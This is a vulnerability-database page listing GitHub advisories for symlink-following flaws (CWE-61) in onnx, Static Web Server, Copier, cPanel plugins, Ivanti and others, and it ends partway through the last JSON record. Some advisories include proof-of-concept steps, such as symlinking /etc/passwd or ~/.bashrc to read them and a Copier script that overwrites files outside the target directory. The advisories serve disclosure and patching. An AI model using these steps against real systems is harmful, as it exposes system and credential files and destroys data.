Common Weakness Enumeration

CWE-61

Allowed

UNIX Symbolic Link (Symlink) Following

Abstraction: Compound · Status: Incomplete

The product, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.

270 vulnerabilities reference this CWE, most recent first.

GHSA-3G44-C4QC-CXM8

Vulnerability from github – Published: 2026-06-14 06:30 – Updated: 2026-06-15 21:30
VLAI
Details

LiteSpeed cPanel plugin before 2.4.8 (as distributed in LiteSpeed WHM PlugIn before 5.3.2.0) mishandles symlinks provided by a user with FTP or web shell access on a shared hosting server running CloudLinux/CageFS, as exploited in the wild in May 2026.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-54420"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-61"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-14T04:16:28Z",
    "severity": "HIGH"
  },
  "details": "LiteSpeed cPanel plugin before 2.4.8 (as distributed in LiteSpeed WHM PlugIn before 5.3.2.0) mishandles symlinks provided by a user with FTP or web shell access on a shared hosting server running CloudLinux/CageFS, as exploited in the wild in May 2026.",
  "id": "GHSA-3g44-c4qc-cxm8",
  "modified": "2026-06-15T21:30:32Z",
  "published": "2026-06-14T06:30:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54420"
    },
    {
      "type": "WEB",
      "url": "https://blog.litespeedtech.com/2026/06/01/security-update-for-litespeed-cpanel-plugin-2"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-54420"
    },
    {
      "type": "WEB",
      "url": "https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/cpanel"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3J95-64VV-272J

Vulnerability from github – Published: 2022-05-24 17:45 – Updated: 2024-04-04 03:05
VLAI
Details

OpenVPN Connect installer for macOS version 3.2.6 and older may corrupt system critical files it should not have access via symlinks in /tmp.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-15075"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59",
      "CWE-61"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-03-30T14:15:00Z",
    "severity": "HIGH"
  },
  "details": "OpenVPN Connect installer for macOS version 3.2.6 and older may corrupt system critical files it should not have access via symlinks in /tmp.",
  "id": "GHSA-3j95-64vv-272j",
  "modified": "2024-04-04T03:05:37Z",
  "published": "2022-05-24T17:45:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15075"
    },
    {
      "type": "WEB",
      "url": "https://openvpn.net/vpn-server-resources/openvpn-connect-for-macos-change-log"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3JV8-HVR8-2QWH

Vulnerability from github – Published: 2024-11-15 18:30 – Updated: 2024-11-15 18:30
VLAI
Details

A vulnerability in the CLI of Cisco TelePresence CE and RoomOS could allow an authenticated, local attacker to overwrite arbitrary files on the local file system of an affected device.

This vulnerability is due to improper access controls on files that are on the local file system. An attacker could exploit this vulnerability by placing a symbolic link in a specific location on the local file system of an affected device. A successful exploit could allow the attacker to overwrite arbitrary files on the affected device. To exploit this vulnerability, an attacker would need to have a remote support user account. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-20091"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-61"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-15T16:15:25Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in the CLI of Cisco TelePresence CE and RoomOS could allow an authenticated, local attacker to overwrite arbitrary files on the local file system of an affected device.\n\nThis vulnerability is due to improper access controls on files that are on the local file system. An attacker could exploit this vulnerability by placing a symbolic link in a specific location on the local file system of an affected device. A successful exploit could allow the attacker to overwrite arbitrary files on the affected device. To exploit this vulnerability, an attacker would need to have a remote support user account.\nCisco\u0026nbsp;has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.",
  "id": "GHSA-3jv8-hvr8-2qwh",
  "modified": "2024-11-15T18:30:50Z",
  "published": "2024-11-15T18:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20091"
    },
    {
      "type": "WEB",
      "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-roomos-file-write-rHKwegKf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3PR6-5RRR-CQPQ

Vulnerability from github – Published: 2025-08-12 15:31 – Updated: 2025-08-12 15:31
VLAI
Details

Improper handling of symbolic links in Ivanti Connect Secure before version 22.7R2.8 or 22.8R2, Ivanti Policy Secure before 22.7R1.5, Ivanti ZTA Gateway before 22.8R2.3-723 and Ivanti Neurons for Secure Access before 22.8R1.4 (Fix deployed on 02-Aug-2025) allows a local authenticated attacker to read arbitrary files on disk.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-5468"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-61"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-12T15:15:31Z",
    "severity": "MODERATE"
  },
  "details": "Improper handling of symbolic links in Ivanti Connect Secure before version 22.7R2.8 or 22.8R2, Ivanti Policy Secure before 22.7R1.5, Ivanti ZTA Gateway before 22.8R2.3-723 and Ivanti Neurons for Secure Access before 22.8R1.4 (Fix deployed on 02-Aug-2025) allows a local authenticated attacker to read arbitrary files on disk.",
  "id": "GHSA-3pr6-5rrr-cqpq",
  "modified": "2025-08-12T15:31:20Z",
  "published": "2025-08-12T15:31:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5468"
    },
    {
      "type": "WEB",
      "url": "https://forums.ivanti.com/s/article/August-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-Multiple-CVEs?language=en_US"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3R9X-F23J-GC73

Vulnerability from github – Published: 2026-03-31 22:34 – Updated: 2026-04-06 16:43
VLAI
Summary
onnx Vulnerable to Path Traversal via Symlink
Details

Summary

A path traversal vulnerability via symlink allows to read arbitrary files outside model or user-provided directory.

Details

The following check for symlink is ineffective and it is possible to point a symlink to an arbitrary location on the file system: https://github.com/onnx/onnx/blob/336652a4b2ab1e530ae02269efa7038082cef250/onnx/checker.cc#L1024-L1033

std::filesystem::is_regular_file performs a status(p) call on the provided path, which follows symbolic links to determine the file type, meaning it will return true if the target of a symlink is a regular file.

PoC

# Create a demo model with external data
import os
import numpy as np
import onnx
from onnx import helper, TensorProto, numpy_helper

def create_onnx_model(output_path="model.onnx"):
    weight_matrix = np.random.randn(1000, 1000).astype(np.float32)

    X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 1000])
    Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 1000])
    W = numpy_helper.from_array(weight_matrix, name="W")

    matmul_node = helper.make_node("MatMul", inputs=["X", "W"], outputs=["Y"], name="matmul")

    graph = helper.make_graph(
        nodes=[matmul_node],
        name="SimpleModel",
        inputs=[X],
        outputs=[Y],
        initializer=[W]
    )

    model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 11)])
    onnx.checker.check_model(model)

    data_file = output_path.replace('.onnx', '.data')

    if os.path.exists(output_path):
        os.remove(output_path)
    if os.path.exists(data_file):
        os.remove(data_file)

    onnx.save_model(
        model,
        output_path,
        save_as_external_data=True,
        all_tensors_to_one_file=True,
        location=os.path.basename(data_file),
        size_threshold=1024 * 1024
    )

if __name__ == "__main__":
    create_onnx_model("model.onnx")
  1. Run the above code to generate a sample model with external data.
  2. Remove model.data
  3. Run ln -s /etc/passwd model.data
  4. Load the model using the following code
  5. Observe check for symlink is bypassed and model is succesfuly loaded
import onnx
from onnx.external_data_helper import load_external_data_for_model

def load_onnx_model_basic(model_path="model.onnx"):
    model = onnx.load(model_path)
    return model

def load_onnx_model_explicit(model_path="model.onnx"):
    model = onnx.load(model_path, load_external_data=False)
    load_external_data_for_model(model, ".")
    return model

if __name__ == "__main__":
    model = load_onnx_model_basic("model.onnx")

A common misuse case for successful exploitation is that an adversary can provide victim with a compressed file, containing poc.onnx and poc.data (symlink). Once the victim uncompress and load the model, symlink read the adversary selected arbitrary file.

Impact

Read sensitive and arbitrary files and environment variable (e.g. /proc/1/environ) from the host that loads the model.

NOTE: this issue is not limited to UNIX.

Sample patch

#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <errno.h>

int open_external_file_no_symlink(const char *base_dir,
                                  const char *relative_path) {
    int dirfd = -1;
    int fd = -1;
    struct stat st;

    // Open base directory
    dirfd = open(base_dir, O_RDONLY | O_DIRECTORY);
    if (dirfd < 0) {
        return -1;
    }

    // Open the target relative to base_dir
    // O_NOFOLLOW => fail if final path component is a symlink
    fd = openat(dirfd,
                relative_path,
                O_RDONLY | O_NOFOLLOW);
    close(dirfd);

    if (fd < 0) {
        // ELOOP is the typical error if a symlink is encountered
        return -1;
    }

    // Inspect the *opened file*
    if (fstat(fd, &st) != 0) {
        close(fd);
        return -1;
    }

    // Enforce "regular file only"
    if (!S_ISREG(st.st_mode)) {
        close(fd);
        errno = EINVAL;
        return -1;
    }

    // fd is now:
    // - not a symlink
    // - not a directory
    // - not a device / FIFO / socket
    // - race-safe
    return fd;
}

Resources

  • https://cwe.mitre.org/data/definitions/61.html
  • https://discuss.secdim.com/t/input-validation-necessary-but-not-sufficient-it-doesnt-target-the-fundamental-issue/1172
  • https://discuss.secdim.com/t/common-pitfalls-for-patching-path-traversal/3368
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.20.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "onnx"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.21.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27489"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23",
      "CWE-61"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-31T22:34:25Z",
    "nvd_published_at": "2026-04-01T18:16:28Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA path traversal vulnerability via symlink allows to read arbitrary files outside model or user-provided directory. \n\n### Details\nThe following check for symlink is ineffective and it is possible to point a symlink to an arbitrary location on the file system:\nhttps://github.com/onnx/onnx/blob/336652a4b2ab1e530ae02269efa7038082cef250/onnx/checker.cc#L1024-L1033\n\n`std::filesystem::is_regular_file` performs a `status(p)` call on the provided path, which follows symbolic links to determine the file type, meaning it will return true if the target of a symlink is a regular file. \n\n\n### PoC\n\n\n\n```python\n# Create a demo model with external data\nimport os\nimport numpy as np\nimport onnx\nfrom onnx import helper, TensorProto, numpy_helper\n\ndef create_onnx_model(output_path=\"model.onnx\"):\n    weight_matrix = np.random.randn(1000, 1000).astype(np.float32)\n\n    X = helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, [1, 1000])\n    Y = helper.make_tensor_value_info(\"Y\", TensorProto.FLOAT, [1, 1000])\n    W = numpy_helper.from_array(weight_matrix, name=\"W\")\n\n    matmul_node = helper.make_node(\"MatMul\", inputs=[\"X\", \"W\"], outputs=[\"Y\"], name=\"matmul\")\n\n    graph = helper.make_graph(\n        nodes=[matmul_node],\n        name=\"SimpleModel\",\n        inputs=[X],\n        outputs=[Y],\n        initializer=[W]\n    )\n\n    model = helper.make_model(graph, opset_imports=[helper.make_opsetid(\"\", 11)])\n    onnx.checker.check_model(model)\n\n    data_file = output_path.replace(\u0027.onnx\u0027, \u0027.data\u0027)\n\n    if os.path.exists(output_path):\n        os.remove(output_path)\n    if os.path.exists(data_file):\n        os.remove(data_file)\n\n    onnx.save_model(\n        model,\n        output_path,\n        save_as_external_data=True,\n        all_tensors_to_one_file=True,\n        location=os.path.basename(data_file),\n        size_threshold=1024 * 1024\n    )\n\nif __name__ == \"__main__\":\n    create_onnx_model(\"model.onnx\")\n```\n\n1. Run the above code to generate a sample model with external data.\n2. Remove `model.data`\n3. Run `ln -s /etc/passwd model.data`\n4. Load the model using the following code\n5. Observe check for symlink is bypassed and model is succesfuly loaded\n\n```python\nimport onnx\nfrom onnx.external_data_helper import load_external_data_for_model\n\ndef load_onnx_model_basic(model_path=\"model.onnx\"):\n    model = onnx.load(model_path)\n    return model\n\ndef load_onnx_model_explicit(model_path=\"model.onnx\"):\n    model = onnx.load(model_path, load_external_data=False)\n    load_external_data_for_model(model, \".\")\n    return model\n\nif __name__ == \"__main__\":\n    model = load_onnx_model_basic(\"model.onnx\")\n\n```\n\nA common misuse case for successful exploitation is that an adversary can provide victim with a compressed file, containing `poc.onnx` and `poc.data (symlink)`. Once the victim uncompress and load the model, symlink read the adversary selected arbitrary file.\n\n\n### Impact\n\nRead sensitive and arbitrary files and environment variable (e.g. /proc/1/environ) from the host that loads the model.\n\nNOTE: this issue is not limited to UNIX.\n\n### Sample patch\n\n```c\n#include \u003cfcntl.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\nint open_external_file_no_symlink(const char *base_dir,\n                                  const char *relative_path) {\n    int dirfd = -1;\n    int fd = -1;\n    struct stat st;\n\n    // Open base directory\n    dirfd = open(base_dir, O_RDONLY | O_DIRECTORY);\n    if (dirfd \u003c 0) {\n        return -1;\n    }\n\n    // Open the target relative to base_dir\n    // O_NOFOLLOW =\u003e fail if final path component is a symlink\n    fd = openat(dirfd,\n                relative_path,\n                O_RDONLY | O_NOFOLLOW);\n    close(dirfd);\n\n    if (fd \u003c 0) {\n        // ELOOP is the typical error if a symlink is encountered\n        return -1;\n    }\n\n    // Inspect the *opened file*\n    if (fstat(fd, \u0026st) != 0) {\n        close(fd);\n        return -1;\n    }\n\n    // Enforce \"regular file only\"\n    if (!S_ISREG(st.st_mode)) {\n        close(fd);\n        errno = EINVAL;\n        return -1;\n    }\n\n    // fd is now:\n    // - not a symlink\n    // - not a directory\n    // - not a device / FIFO / socket\n    // - race-safe\n    return fd;\n}\n```\n\n### Resources\n\n* https://cwe.mitre.org/data/definitions/61.html\n* https://discuss.secdim.com/t/input-validation-necessary-but-not-sufficient-it-doesnt-target-the-fundamental-issue/1172\n* https://discuss.secdim.com/t/common-pitfalls-for-patching-path-traversal/3368",
  "id": "GHSA-3r9x-f23j-gc73",
  "modified": "2026-04-06T16:43:13Z",
  "published": "2026-03-31T22:34:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27489"
    },
    {
      "type": "WEB",
      "url": "https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/onnx/onnx"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "onnx Vulnerable to Path Traversal via Symlink"
}

GHSA-3VGW-585J-4M45

Vulnerability from github – Published: 2026-06-18 15:02 – Updated: 2026-06-18 15:02
VLAI
Summary
BBOT: Path traversal (Zip-Slip) in unarchive module - incomplete fix for CVE-2025-10284
Details

The unarchive internal module's archive extraction commands perform no code-level validation on extracted file paths, relying entirely on the behavior of external tools (e.g. GNU tar) which varies by platform. While CVE-2025-10284 addressed git-specific RCE vectors, the underlying archive extraction path traversal was never fixed. On systems with GNU tar < 1.34 (Ubuntu 20.04, Debian Buster, CentOS 7, many Docker base images), a malicious archive can write files outside the intended extraction directory.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.8.4"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "bbot"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.1"
            },
            {
              "fixed": "2.8.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-12565"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-61"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T15:02:35Z",
    "nvd_published_at": "2026-06-17T23:17:02Z",
    "severity": "MODERATE"
  },
  "details": "The `unarchive` internal module\u0027s archive extraction commands perform no code-level validation on extracted file paths, relying entirely on the behavior of external tools (e.g. GNU tar) which varies by platform. While CVE-2025-10284 addressed git-specific RCE vectors, the underlying archive extraction path traversal was never fixed. On systems with GNU tar \u003c 1.34 (Ubuntu 20.04, Debian Buster, CentOS 7, many Docker base images), a malicious archive can write files outside the intended extraction directory.",
  "id": "GHSA-3vgw-585j-4m45",
  "modified": "2026-06-18T15:02:35Z",
  "published": "2026-06-18T15:02:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/blacklanternsecurity/bbot/security/advisories/GHSA-3vgw-585j-4m45"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12565"
    },
    {
      "type": "WEB",
      "url": "https://github.com/blacklanternsecurity/bbot/commit/4fb38fd6e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/blacklanternsecurity/bbot"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "BBOT: Path traversal (Zip-Slip) in unarchive module - incomplete fix for CVE-2025-10284"
}

GHSA-3WGQ-WRWC-VQMV

Vulnerability from github – Published: 2025-09-23 17:45 – Updated: 2025-11-18 16:40
VLAI
Summary
astral-tokio-tar has a path traversal in tar extraction
Details

Impact

In versions 0.5.3 and earlier of astral-tokio-tar, tar archives may extract outside of their intended destination directory when using the Entry::unpack_in_raw API. Additionally, the Entry::allow_external_symlinks control (which defaults to true) could be bypassed via a pair of symlinks that individually point within the destination but combine to point outside of it.

These behaviors could be used individually or combined to bypass the intended security control of limiting extraction to the given directory. This in turn would allow an attacker with a malicious tar archive to perform an arbitrary file write and potentially pivot into code execution (e.g. by overwriting a file that the user or system then executes or uses to execute code).

The impact of this vulnerability for downstream API users of this crate is high, per above. However, for this crate's main downstream user (uv), the impact of this vulnerability is low due to its overlap with equivalent user capabilities in source distributions. See GHSA-7j9j-68r2-f35q for additional details.

Patches

Versions 0.5.4 and newer of astral-tokio-tar address the vulnerability above. Users should upgrade to 0.5.4 or newer.

Workarounds

Users are advised to upgrade to version 0.5.4 or newer to address this advisory.

There is no workaround other than upgrading.

References

  • See GHSA-7j9j-68r2-f35q for how this vulnerability affects uv, astral-tokio-tar's primary downstream user. Observe that unlike this advisory, uv's advisory is considered low severity due to overlap with intentional existing capabilities in source distributions.
  • This vulnerability is similar to (but not related in code) to CVE-2025-4138 and CVE-2025-4517, which concern Python's tarfile module.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.5.3"
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "astral-tokio-tar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59825"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-61"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-23T17:45:07Z",
    "nvd_published_at": "2025-09-23T20:15:33Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nIn versions 0.5.3 and earlier of astral-tokio-tar, tar archives may extract outside of their intended destination directory when using the `Entry::unpack_in_raw` API. Additionally, the `Entry::allow_external_symlinks` control (which defaults to `true`) could be bypassed via a pair of symlinks that individually point within the destination but combine to point outside of it.\n\nThese behaviors could be used individually or combined to bypass the intended security control of limiting extraction to the given directory. This in turn would allow an attacker with a malicious tar archive to perform an arbitrary file write and potentially pivot into code execution (e.g. by overwriting a file that the user or system then executes or uses to execute code). \n\nThe impact of this vulnerability for downstream API users of this crate is **high**, per above. However, for this crate\u0027s main downstream user (uv), the impact of this vulnerability is **low** due to its overlap with equivalent user capabilities in source distributions. See GHSA-7j9j-68r2-f35q for additional details.\n\n### Patches\n\nVersions 0.5.4 and newer of astral-tokio-tar address the vulnerability above. Users should upgrade to 0.5.4 or newer.\n\n### Workarounds\n\nUsers are advised to upgrade to version 0.5.4 or newer to address this advisory.\n\nThere is no workaround other than upgrading.\n\n### References\n\n* See GHSA-7j9j-68r2-f35q for how this vulnerability affects uv, astral-tokio-tar\u0027s primary downstream user. Observe that **unlike** this advisory, uv\u0027s advisory is considered **low severity** due to overlap with intentional existing capabilities in source distributions.\n* This vulnerability is similar to (but not related in code) to CVE-2025-4138 and CVE-2025-4517, which concern Python\u0027s tarfile module.",
  "id": "GHSA-3wgq-wrwc-vqmv",
  "modified": "2025-11-18T16:40:30Z",
  "published": "2025-09-23T17:45:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/astral-sh/tokio-tar/security/advisories/GHSA-3wgq-wrwc-vqmv"
    },
    {
      "type": "WEB",
      "url": "https://github.com/google/security-research/security/advisories/GHSA-9p78-p5g6-gcj8"
    },
    {
      "type": "WEB",
      "url": "https://github.com/astral-sh/uv/issues/12163"
    },
    {
      "type": "WEB",
      "url": "https://github.com/astral-sh/tokio-tar/commit/036fdecc85c52458ace92dc9e02e9cef90684e75"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/astral-sh/tokio-tar"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U",
      "type": "CVSS_V4"
    }
  ],
  "summary": "astral-tokio-tar has a path traversal in tar extraction"
}

GHSA-3X6M-3GRH-599C

Vulnerability from github – Published: 2026-05-08 21:31 – Updated: 2026-05-15 18:30
VLAI
Details

A chmod call in the cPanel Nova plugin's Cpanel::Nova::Connector follows symlinks, allowing setting root permissions on arbitrary system files or directories. That can cause DoS or local privilege escalation when an authenticated cPanel user places a symlink at a user-controlled legacy Nova path under their home directory.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-29203"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-61"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-08T19:16:30Z",
    "severity": "HIGH"
  },
  "details": "A chmod call in the cPanel Nova plugin\u0027s Cpanel::Nova::Connector follows symlinks, allowing setting root permissions on arbitrary system files or directories. That can cause DoS or local privilege escalation when an authenticated cPanel user places a symlink at a user-controlled legacy Nova path under their home directory.",
  "id": "GHSA-3x6m-3grh-599c",
  "modified": "2026-05-15T18:30:30Z",
  "published": "2026-05-08T21:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29203"
    },
    {
      "type": "WEB",
      "url": "https://support.cpanel.net/hc/en-us/articles/40311543760407-Security-CVE-2026-29203-cPanel-WHM-WP2-Security-Update-May-08-2026"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-459F-X8VQ-XJJM

Vulnerability from github – Published: 2025-12-08 22:18 – Updated: 2025-12-09 19:17
VLAI
Summary
Static Web Server vulnerable to a symbolic link path traversal
Details

Summary

Symbolic links (symlinks) could be used to access files or directories outside the intended web root folder.

Details

SWS generally does not prevent symlinks from escaping the web server’s root directory. Therefore, if a malicious actor gains access to the web server’s root directory, they could create symlinks to access other files outside the designated web root folder either by URL or via the directory listing.

PoC

  • Serve a directory (web root) with SWS.
  • Create a symlink inside the web root that points to a file outside the web root. e.g. ln -s escape.txt $HOME/.bashrc
  • Open http://localhost/escape.txt in your browser.
  • The file content will be served.

Impact

Any web server that runs with elevated privileges (e.g., root/administrator) and handles user-supplied file uploads is primarily impacted.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.40.0"
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "static-web-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.40.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-67487"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-61"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-08T22:18:00Z",
    "nvd_published_at": "2025-12-09T16:18:24Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nSymbolic links (_symlinks_) could be used to access files or directories outside the intended web root folder.\n\n### Details\n\nSWS generally does not prevent symlinks from escaping the web server\u2019s root directory. Therefore, if a malicious actor gains access to the web server\u2019s root directory, they could create symlinks to access other files outside the designated web root folder either by URL or via the directory listing.\n\n### PoC\n\n- Serve a directory (web root) with SWS.\n- Create a symlink inside the web root that points to a file outside the web root.\n  e.g. `ln -s escape.txt $HOME/.bashrc`\n- Open `http://localhost/escape.txt` in your browser.\n- The file content will be served.\n\n### Impact\n\nAny web server that runs with elevated privileges (e.g., root/administrator) and handles user-supplied file uploads is primarily impacted.",
  "id": "GHSA-459f-x8vq-xjjm",
  "modified": "2025-12-09T19:17:06Z",
  "published": "2025-12-08T22:18:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/static-web-server/static-web-server/security/advisories/GHSA-459f-x8vq-xjjm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67487"
    },
    {
      "type": "WEB",
      "url": "https://github.com/static-web-server/static-web-server/commit/308f0d26ceb9c2c8bd219315d0f53914763357f2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/static-web-server/static-web-server"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Static Web Server vulnerable to a symbolic link path traversal"
}

GHSA-4FQP-R85R-HXQH

Vulnerability from github – Published: 2026-01-21 22:19 – Updated: 2026-02-02 16:33
VLAI
Summary
Copier safe template has arbitrary filesystem write access via directory symlinks when _preserve_symlinks: true
Details

Impact

Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions which would require passing the --UNSAFE,--trust flag. As it turns out, a safe template can currently write to arbitrary directories outside the destination path by using directory a symlink along with _preserve_symlinks: true and a generated directory structure whose rendered path is inside the symlinked directory. This way, a malicious template author can create a template that overwrites arbitrary files (according to the user's write permissions), e.g., to cause havoc.

[!NOTE]

At the time of writing, the exploit is non-deterministic, as Copier walks the template's file tree using os.scandir which yields directory entries in arbitrary order.

Reproducible example (may or may not work depending on directory entry yield order):

mkdir other/
pushd other/
echo "sensitive" > sensitive.txt
popd

mkdir src/
pushd src/
ln -s ../other other
echo "overwritten" > "{{ pathjoin('other', 'sensitive.txt') }}.jinja"
echo "_preserve_symlinks: true" > copier.yml
tree .
# .
# ├── copier.yml
# ├── other -> ../other
# └── {{ pathjoin('other', 'sensitive.txt') }}.jinja
#
# 1 directory, 2 files
popd

uvx copier copy --overwrite src/ dst/

cat other/sensitive.txt
# overwritten

Patches

n/a

Workarounds

n/a

References

n/a

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "copier"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "9.11.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-23986"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-61"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-21T22:19:29Z",
    "nvd_published_at": "2026-01-21T23:15:52Z",
    "severity": "MODERATE"
  },
